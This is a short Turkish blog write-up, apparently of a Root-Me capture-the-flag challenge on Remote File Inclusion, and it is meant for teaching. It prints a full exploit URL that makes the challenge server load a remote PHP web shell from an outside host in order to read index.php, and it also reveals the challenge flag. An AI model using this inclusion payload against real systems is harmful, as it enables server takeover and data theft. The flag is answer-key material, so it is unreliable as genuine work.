Root-Me (25-Remote File İnclusion) | Muhammed SÖNER l

Root-Me (25-Remote File İnclusion)

Siteyi açtığımızda dil seçenekleri görülmektedir. Hemen bir dil seçelim. Seçtiğimizde bağlantı yapısı http://challenge01.root-me.org/web-serveur/ch13/?lang=en şu şekilde olmaktadır. Basit bir şekilde kendi sitemde index.php’yi okuduğumda uzaktan dosyayı çalıştırabilmektedir.

Daha sonra hemen index.php’yi okumaya çalıştığımda buna izin vermedi verilmedi. Herhangi bir shell sitesinden bağlantı alıp index.php’yi okuyabildik  

Shell yolu: http://challenge01.root-me.org/web-serveur/ch13/?lang=http://privshells.com/upload/ekinox.txt?&dlink=edit&edit=index.php&scdir=/challenge/web-serveur/ch13

flag : R3m0t3_iS_r3aL1y_3v1l



Yazılım Mühendisi


Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir